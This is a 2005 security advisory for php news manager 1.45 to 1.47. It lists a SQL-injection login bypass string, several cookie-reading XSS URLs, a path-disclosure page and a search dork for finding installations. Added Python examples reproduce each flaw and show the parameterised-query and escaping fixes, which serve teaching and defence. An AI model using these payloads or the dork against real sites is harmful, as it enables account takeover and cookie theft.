14.17 28/07/2005

php news manager 1.45/1.46/1.47 (last release date 2005-05-03)
login bypass/sql injection, multiple cross site scripting & path disclosure


vulnerabilities have been tested on default installations available at:
http://www.skintech.org/newman/downloads.php


login bypass/sql injection:

login:  whatever' or 'a'='a
pass:   whatever' or 'a'='a

(you can inject any always-true expression, like 'a'='a', into the login query ....)
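Added example (not code from the advisory or from phpNewMan): a minimal reproduction of why the login bypass works and how the query should have been written. The flawed pattern is the credentials concatenated straight into the SQL string; the fix is a parameterised query, where the same input is compared as a literal string and matches nothing. The user table, the user name and the password are constructed for this demo only, and sqlite3 stands in for the MySQL backend.

```python
import sqlite3

PAYLOAD = "whatever' or 'a'='a"   # the advisory's login/pass value


def make_db():
    """Build an in-memory table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret-admin-pw')")
    return conn


def login_vulnerable(conn, user, pw):
    """Mirrors the flaw: untrusted input concatenated into the SQL text.

    With PAYLOAD for both fields the WHERE clause becomes
      username = 'whatever' or 'a'='a' AND password = 'whatever' or 'a'='a'
    which is true for every row, so the first user (admin) is returned.
    """
    sql = ("SELECT username FROM users WHERE username = '" + user +
           "' AND password = '" + pw + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, pw):
    """Parameterised version: the driver binds the values, so the quote
    characters in PAYLOAD are just data and the lookup fails."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, PAYLOAD, PAYLOAD),  # 'admin'
        "safe": login_safe(conn, PAYLOAD, PAYLOAD),              # None
        "safe_real_creds": login_safe(conn, "admin", "secret-admin-pw"),
    }


if __name__ == "__main__":
    print(demo())
```

Storing a password hash instead of the clear-text value and comparing it in application code would be the further step; the point here is only that binding parameters removes the injection regardless of what the input contains.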

xss:
http://[target]/[path]/browse.php?newman_ver=</title><script>alert(document.cookie)</script>
http://[target]/[path]/header.php?title=</title><script>alert(document.cookie)</script>
http://[target]/[path]/header.php?logo="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?newman_ver=<script>alert(document.cookie)</script>
http://[target]/[path]/gallery.php?newman_ver=</title><script>alert(document.cookie)</script>
http://[target]/[path]/newspix.php?newman_ver=</title><script>alert(document.cookie)</script>
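Added example (not phpNewMan code): the two output contexts the XSS URLs above abuse are the text inside <title> (closed early with `</title>`) and a double-quoted attribute (closed early with `">`). Both are neutralised by HTML-escaping the value for its context, and a parameter like `newman_ver` that is only ever a version number can additionally be checked against an allow-list pattern. The rendering functions and the version regex are assumptions for this demo; they are not the application's own templates.

```python
import html
import re

# Payloads taken from the advisory's browse.php/header.php URLs.
XSS_TITLE = "</title><script>alert(document.cookie)</script>"
XSS_LOGO = '"><script>alert(document.cookie)</script>'

# Constructed allow-list: a version string is digits separated by dots.
VERSION_RE = re.compile(r"^[0-9]+(\.[0-9]+)*$")


def render_header_unsafe(title, logo):
    """Reproduces the flaw: request parameters echoed verbatim into HTML."""
    return (f"<title>{title}</title>\n"
            f'<img src="{logo}" alt="logo">')


def render_header_safe(title, logo):
    """Escapes &, <, >, \" and ' so the value can neither close the <title>
    element nor break out of the src attribute."""
    return (f"<title>{html.escape(title)}</title>\n"
            f'<img src="{html.escape(logo, quote=True)}" alt="logo">')


def validate_version(value, default="1.47"):
    """Allow-list check for newman_ver: anything that is not a plain
    dotted version string is replaced by a constructed default."""
    return value if VERSION_RE.match(value) else default


def contains_script_tag(fragment):
    """Crude check used to show whether a live <script> tag survived."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_header_unsafe(XSS_TITLE, XSS_LOGO))
    print(render_header_safe(XSS_TITLE, XSS_LOGO))
    print(validate_version(XSS_TITLE), validate_version("1.47"))
```

Escaping at the output point is the general fix; the allow-list is an extra layer that only works for parameters whose legitimate values have a fixed shape, which is the case for a version number but not for a free-text title.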

path disclosure:
http://[target]/[path]/header.php

googledork:
"Powered by phpNewMan Version"

rgod
email: retrogod[at]aliceposta.it
site: http://rgod.altervista.org